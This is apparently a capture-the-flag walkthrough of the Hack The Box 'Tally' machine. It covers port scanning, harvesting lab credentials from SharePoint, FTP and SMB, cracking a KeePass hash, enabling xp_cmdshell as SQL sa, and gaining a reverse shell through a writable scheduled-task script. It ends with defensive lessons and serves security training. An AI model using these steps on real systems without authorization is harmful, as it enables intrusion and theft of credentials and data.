Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.59 All
All: Runs all the scans consecutively.
Running all scans on 10.10.10.59Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.043s latency).
Not shown: 726 closed ports, 267 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-httpNmap done: 1 IP address (1 host up) scanned in 2.56 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.15s latency).PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-07T07:00:34
|_ start_date: 2020-03-07T06:59:02Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.28 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:59 EST
Warning: 10.10.10.59 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.59
Host is up (0.19s latency).
All 1000 scanned ports on 10.10.10.59 are closed (704) or open|filtered (296)Nmap done: 1 IP address (1 host up) scanned in 964.68 seconds---------------------Starting Nmap Full Scan----------------------
Nmap scan report for 10.10.10.59
Host is up (0.098s latency).
Not shown: 61247 closed ports, 4268 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 179.34 seconds
Raw packets sent: 88392 (3.889MB) | Rcvd: 76277 (3.051MB)Making a script scan on extra ports: 1433, 5985, 15567, 32843, 32844, 32846, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:18 EST
Nmap scan report for 10.10.10.59
Host is up (0.081s latency).PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-03-07T06:59:32
|_Not valid after: 2050-03-07T06:59:32
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.91 seconds---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:19 EST
/usr/local/bin/nmapAutomator.sh: line 226: 2165 Segmentation fault $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"Running Vuln scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:20 EST
Nmap scan report for 10.10.10.59
Host is up (0.040s latency).PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
808/tcp open ccproxy-http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:microsoft:sql_server:2016:
| CVE-2020-0618 6.5 https://vulners.com/cve/CVE-2020-0618
| CVE-2019-1068 6.5 https://vulners.com/cve/CVE-2019-1068
| CVE-2016-7250 6.5 https://vulners.com/cve/CVE-2016-7250
| CVE-2016-7249 6.5 https://vulners.com/cve/CVE-2016-7249
| CVE-2017-8516 5.0 https://vulners.com/cve/CVE-2017-8516
| CVE-2016-7251 4.3 https://vulners.com/cve/CVE-2016-7251
|_ CVE-2016-7252 4.0 https://vulners.com/cve/CVE-2016-7252
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
15567/tcp open http Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /_layouts/images/helpicon.gif: MS Sharepoint
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
32846/tcp open storagecraft-image StorageCraft Image Manager
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49665/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49666/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49667/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49668/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49669/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49670/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to tryService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 839.56 seconds
Ports 135, 49664, 49665, 49666, 49667, 49668, 49669 & 49670: running Microsoft Windows RPC
Port 808: running ccproxy-http
Port 1433: running Microsoft SQL Server 2016
Port 32846: running StorageCraft Image Manager
Before we move on to enumeration, let’s make some mental notes about the scan results.
We have a bunch of ports running web servers. We’ll start off with enumerating port 80 and work our way down. I terminated nmapAutomator since it would have taken a very long time to enumerate all those ports.
Nmap didn’t report anonymous login for FTP, so this is unlikely to be our point of entry, unless we get credentials. Nmap has reported this as a false negative before, so it is always good to manually verify it.
Same goes for SMB. We’ll need credentials to access the service.
Port 1433 is running a Microsoft SQL Server. If we can find a system administrator account, we’ll have code execution.
Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
It’s running SharePoint. Since SharePoint has specific directories, we won’t use the normal word list when we gobuster it. Instead we’ll use a specific one to sharePoint.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u 10.10.10.59
This outputs a ton of results to go through. It is easier to instead just do a google search on the important URLs in SharePoint and try those. One interesting entry is the viewlsts.aspx page that displays the site content.
We see that there is one document and one site page. Clicking on Documents we find a document titled ftp-details.
Download the document and view it.
FTP detailshostname: tallyworkgroup: htb.localpassword: UTDRSCH53c"$6hysPlease create your own user folder upon logging in
The document contains an FTP password but no username. Next, click on SitePages. This for some reason directs us to the following incorrect URL.
Simply removing the _layouts/15/start.aspx# portion of the URL allows us to view the site pages.
Click on the Finance Team page.
Now we have both a username and password to log into the FTP server!
Port 21 FTP
Log into FTP.
root@kali:~# ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:root): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
View the files in the current directory.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
Navigating through the directories, we find a KeePass database in Tim’s directory.
ftp> pwd
257 "/User/Tim/Files" is current directory.ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-15-17 07:58PM 17 bonus.txt
09-15-17 08:24PM <DIR> KeePass-2.36
09-15-17 08:22PM 2222 tim.kdbx
226 Transfer complete
Download the database to our attack machine.
ftp> get tim.kdbx
The KeePass database is password protected. In order to crack the password using John the Ripper (JtR), we’ll have to extract a JtR compatible hash of the password. This can be done as follows.
keepass2john tim.kdbx > hash.txt
Then run JtR on the hash.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We get a hit back informing us that the password is “simplementeyo”.
Now we have all the information we need to open the KeePass database. To do that from the command line, we’ll use the kpcli program.
Going through the entries, we find two credentials. One of the credentials Finance/Acc0unting labelled Tally ACCT share will probably give us access to SMB, so we’ll start there.
Port 139 SMB
Let’s log into the ACCT share using the credentials we found.
root@kali:~/Desktop/htb/tally/smb# smbclient //10.10.10.59/ACCT -U FinanceEnter WORKGROUP\Finance's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Sep 18 01:58:18 2017
.. D 0 Mon Sep 18 01:58:18 2017
Customers D 0 Sun Sep 17 16:28:40 2017
Fees D 0 Mon Aug 28 17:20:52 2017
Invoices D 0 Mon Aug 28 17:18:19 2017
Jess D 0 Sun Sep 17 16:41:29 2017
Payroll D 0 Mon Aug 28 17:13:32 2017
Reports D 0 Fri Sep 1 16:50:11 2017
Tax D 0 Sun Sep 17 16:45:47 2017
Transactions D 0 Wed Sep 13 15:57:44 2017
zz_Archived D 0 Fri Sep 15 16:29:35 2017
zz_Migration D 0 Sun Sep 17 16:49:13 2017
8387839 blocks of size 4096. 709452 blocks available
After enumerating all the directories, we find two interesting entries. The first is in the zz_Archived\SQL directory.
smb: \> cd \zz_Archived\SQLsmb: \zz_Archived\SQL\> dir
. D 0 Fri Sep 15 16:29:36 2017
.. D 0 Fri Sep 15 16:29:36 2017
conn-info.txt A 77 Sun Sep 17 16:26:56 2017
8387839 blocks of size 4096. 709178 blocks availablesmb: \zz_Archived\SQL\> get conn-info.txt
getting file \zz_Archived\SQL\conn-info.txt of size 77 as conn-info.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
View the content of the file on the attack machine.
old server detailsdb: sa
pass: YE%TJC%&HYbe5Nwhave changed for tally
We have SQL credentials for an old server.
The other interesting entry we found is in the zz_Migration\Binaries\New folder directory.
The file tester.exe looks like a custom executable file. Download it to your attack machine.
get tester.exe
Use the strings command to print the list of printable characters in the file.
root@kali:~/Desktop/htb/tally/smb# strings tester.exe...
WVS3
<$Xf
^_[3
SQLSTATE:
Message:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad cast
bad locale name
false
true
generic
iostream
iostream stream error
ios_base::badbit set
...
We get another SQL username and password.
username: sa
password: GWE3V65#6KFH93@4GWTG2G
Port 1433 SQL
Let’s test out the first credentials we found to log into the database.
sqsh -S 10.10.10.59 -U sa -P "YE%TJC%&HYbe5Nw"
-S: server
-U: username
-P: password
We get a login failed error. Let’s test out the second credentials we found.
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"
We’re in!
Since this is a System Administrator (SA) account, we should be able to run system commands.
Test out the whoami command using xp_cmdshell.
1> xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We get an error telling us that the xp_cmdshell option is disabled. Since we have an account with the highest level of privilege (SA), we can simply enable it.
1> EXEC sp_configure 'show advanced options', 1;
2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to
install.
(return status = 0)
1> RECONFIGURE;
2> go
Try the whoami command again.
Perfect, we finally have code execution!
Initial Foothold
Let’s use that to send a reverse shell to our attack machine.
Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
There’s two interesting files SPBestWarmUp.ps1 and SPBestWarmUp.xml. Looking through the SPBestWarmUp.xml script we see that it is running the SPBestWarmUp.ps1 with Administrator privileges every hour (indicated by the field <Interval>PT1H</Interval>) . This is probably run as a scheduled task. We can confirm that once we get a reverse shell with administrator privileges.
As the user Sarah, we own the file. Therefore, we could simply change the content of the file to include a reverse shell and wait until the hour changes and the scheduled task gets executed with administrator privileges.
Change the content of the script to send a reverse shell back to our attack machine.
Wait until the scheduled task is run. We get a shell!
We can view the scheduled tasks using the following command.
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited four vulnerabilities.
Insecure SharePoint permissions. An anonymous user was allowed to access SharePoint content. We used that to our advantage to enumerate site pages and documents on SharePoint. The administrator should have secured/restricted external anonymous access, especially when it is a public facing website.
Cleartext FTP credentials. After enumerating the content saved on SharePoint, we found a document that contains an FTP password and a site page that contains the username that corresponded to the password. We then used these credentials to log into the FTP server. Sensitive information should not be stored in cleartext and permission restrictions should be put in place that prevent an unauthorized user from accessing files that contain sensitive information.
Weak authentication credentials. After logging into the FTP server, we found a KeePass database that was protected with a weak password. Clearly, the user is security-aware and therefore is using a KeePass database to store his passwords. However, the password to the database was not strong enough and therefore we were able to crack it in a matter of seconds and gain access to all the other passwords that the user had stored in the database. The user should have used a strong password that is difficult to crack.
Hardcoded password in an executable. After cracking the password for the KeePass database, we found SMB credentials that allowed us to log into one the shares. There, we found a custom executable file that contained a hardcoded SQL system administrator (SA) password. Using these credentials, we logged into the SQL database and executed system commands to gain initial access on the box. It’s considered insecure practice to store passwords in applications. If it is absolutely necessary, there are several ways you can obscure these passwords and make it harder for an attacker to discover the passwords. However, with enough skill, time and motive, the attacker will be able recover the passwords.
To escalate privileges we exploited one vulnerability.
Security misconfiguration. There is a scheduled task that runs a user owned file with administrator privileges. Since we owned the file, we simply changed the content of the file to send a reverse shell back to our attack machine. To avoid this vulnerability, the scheduled task should have been run with user privileges as apposed to administrator privileges. Or, restrictions should have been put on the script that only allow an administrator to change the file.
